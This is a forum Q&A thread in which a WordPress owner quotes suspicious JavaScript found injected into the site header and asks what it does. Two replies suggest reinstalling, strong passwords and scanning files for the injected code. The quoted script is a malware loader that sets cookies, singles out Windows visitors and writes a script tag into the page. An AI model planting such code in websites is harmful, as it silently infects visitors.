views:

69

answers:

2

I have a WordPress installation that has been targeted quite heavily by a phishing operation. I thought I had the security mostly covered except I found this in the header:

var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('<\/script>')};

That URL at the the end is super suspicious. I googled but found no leads :-(

I haven't yet found the source of the code in my WP installation. It's not written into the template files or database. In the process of updating WP install now.

Does anyone have any knowledge of this?

A: 

That looks strange to me. Maybe try reinstalling wordpress and choose very complex passwords so nobody unauthorized can access your site. You might want to remove the google analytics code from the page and see if that makes a difference. Complex passwords include numbers, uppercase and lowercase letters, slashes and anything else you can think of. Make sure it is longer then 8 letters. If your site is infected, take it down from the web NOW until your sure it's not.

alexy13
All the passwords have been changed to 20 character strings. Said javascript was disabled and site has been deactivated but had trouble finding the root of the problem.
Niels Oeltjen
A: 

Randomly check some of the wordpress install files. My ftp password was leaked. I use my girlfriends laptop once and saved the password. She must have downloaded some malware that captured the passwords. The result was that javascript was injected into pretty much any file with a standard web extension. Then any page you could browse to was attempting to redirect the user to some russian site. Checking the site in chrome showed a malware warning. The code I saw was more obfuscated than what you are seeing, but I would check into it. I ended up changing all passwords and running a script to check every file on the server for the footprint I was seeing and remove it. That seems to have worked out for me. If it is too complicated contact your host and have them look at that account.

spyderman4g63